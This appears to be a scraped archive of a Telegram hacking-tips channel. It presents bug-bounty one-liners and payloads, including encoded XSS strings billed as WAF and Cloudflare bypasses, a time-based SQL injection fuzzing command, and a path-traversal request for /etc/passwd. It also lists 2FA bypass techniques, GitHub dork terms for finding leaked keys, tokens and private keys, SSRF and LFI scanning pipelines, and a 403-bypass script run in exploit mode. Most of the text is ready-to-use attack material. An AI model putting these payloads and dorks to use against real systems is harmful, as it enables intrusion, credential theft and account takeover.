Termux All Command [Telegram Group]

Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resources. It is Also backup of Facebook Page
Telegram Channel >> https://t.me/termuxcommandfull
Facebook Page >> https://www.facebook.com/termux.command.full

1 184
Subscribers
Posts Archive
Encoded XSS bypassed like a charm WAF <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> #XSS #penetrationtest #CYBERSECURITYARMS

data.txt (0.18 KB)

Find and detect time based SQLi with ffuf
Payloads: https://lnkd.in/dDX9zkN4
Command:
ffuf -u "https://HOST/Less-10/?id=FUZZ" -w ~/pentest/SQLi_Sleeps/data.txt -mt ">20000" -enc FUZZ:urlencode -timeout 150 -v

Top 3 RXSS payloads
'";//><img/src=x onError="${x};alert(1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>

Simple Reflected XSS
1. subfinder -d target.com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxss

XSS in the .css URL path Original url: "target/lib/css/animated.min.css" XSS Found in: "/lib/css/animated.min'"/>alert(document.domain)<%2fscript>.css"

Some Web Application Penetration testing or Bug Bounty notes :) Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE

🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨
This is how you can send such a request using #curl:
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET

2FA Bypass Techniques
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9. Handling of Previous Sessions

🔥🔥Github-Dork🚀🚀🔥🔥
Happy Hunting
api_key
app_AWS_SECRET_ACCESS_KEY
app_secret
authorization
Ldap
aws_access_key_id
secret
bash_history
bashrc%20password
beanstalkd
client secre
composer
config
credentials
DB_PASSWORD
dotfiles
.env file
.exs file
extension:json mongolab.com
extension:pem%20private
extension:ppk private
extension:sql mysql dump
extension:yaml mongolab.com
.mlab.com password
mysql
npmrc%20_auth
passwd
passkey
rds.amazonaws.com password
s3cfg
send_key
token
filename:.bash_history
filename:.bash_profile aws
filename:.bashrc mailchimp
filename:CCCam.cfg
filename:config irc_pass
filename:config.php dbpasswd
filename:config.json auths
filename:config.php pass
filename:config.php dbpasswd
filename:connections.xml
filename:.cshrc
filename:.git-credentials
filename:.ftpconfig
filename:.history
filename:gitlab-recovery-codes.txt
filename:.htpasswd
filename:id_rsa
filename:.netrc password
FTP
filename:wp-config.php
git-credentials
github_token
HEROKU_API_KEY language:json
HEROKU_API_KEY language:shell
GITHUB_API_TOKEN language:shell
oauth
OTP
databases password
[WFClient] Password= extension:ica
xoxa_Jenkins
security_credentials
#bugbountytips #GitHub

Find xss with this automation of the following work
1. subfinder -d indeed.com -o indeed.txt // Find Subdomains
2. httpx -l indeed.txt -o httpx.txt // Live Subdomains
3. echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4. cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5. cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6. cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script https://github.com/dirtycoder0124/xss

XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

Payload for XSS + SQLi + SSTI/CSTI ! '">{{7*7}}

When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs. Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search. Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters. Example usage:
ffuf -u https://sub.target.com/promo/offer/1234/FUZZ -w wordlist.txt -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality. Example scenario:
Found path: https://sub.target.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.

You can now passively enumerate all endpoints of a website with katana. (No need for waybackurls)
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

A payload that bypasses Cloudflare WAF <img/src=x onError="${x};alert(Hello);">

🕵️‍♂️ Advanced Bug Bounty Tips: Unveiling SSRF, XSS, and LFI 🐞
Are you ready to take your bug bounty hunting to the next level? Today, I'm sharing some advanced techniques to uncover Server-Side Request Forgery (SSRF), Cross-Site Scripting (XSS), and Local File Inclusion (LFI) vulnerabilities using a powerful arsenal of tools:
🔍 XSS Hunt: To find XSS, we're harnessing the power of gf, httpx, waybackurls, qsreplace, and more. Check out this command:
cat file.txt | gf xss | grep 'source=' | qsreplace '""><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;31mVulnerable"; done
This command scours the target domain for XSS vulnerabilities.
🚀 SSRF Discovery: Now, let's uncover SSRF using findomain, httpx, and more. Here's the command:
findomain -t example[.]com -q | httpx -silent -threads 1000 | gau | grep '=' | qsreplace http://YOUR[.]burpcollaborator[.]net
This command identifies SSRF potential and sends requests to your collaborator.
🔍 LFI Detection: For LFI, follow this command with findomain, waybackurls, and ffuf:
findomain -t example[.]com -q | waybackurls | gf lfi | qsreplace FUZZ | while read url; do ffuf -u $url -mr "root:x" -w ~/wordlist/LFI.txt; done
This script uncovers Local File Inclusion vulnerabilities.
🛠️ Make sure to have these tools handy and stay tuned for more exciting bug bounty tips! Let's make the internet safer, one bug at a time. Happy hacking! 💻🐛
◼️ Join Our WhatsApp Group To Connect With Cyber Warriors and Bug Bounty Hunters -> https://lnkd.in/gaNB69Qb
#BugBounty #CyberSecurity #EthicalHacking #InfoSec

Run 403 Bypass from anywhere
Steps:
sudo git clone https://lnkd.in/grpRHnWv /opt/4-ZERO-3
sudo chmod +x /opt/4-ZERO-3/403-bypass.sh
sudo ln -sf /opt/4-ZERO-3/403-bypass.sh /usr/local/bin/403-bypass
403-bypass -h
403-bypass -u https://lnkd.in/g4t9cuEz --exploit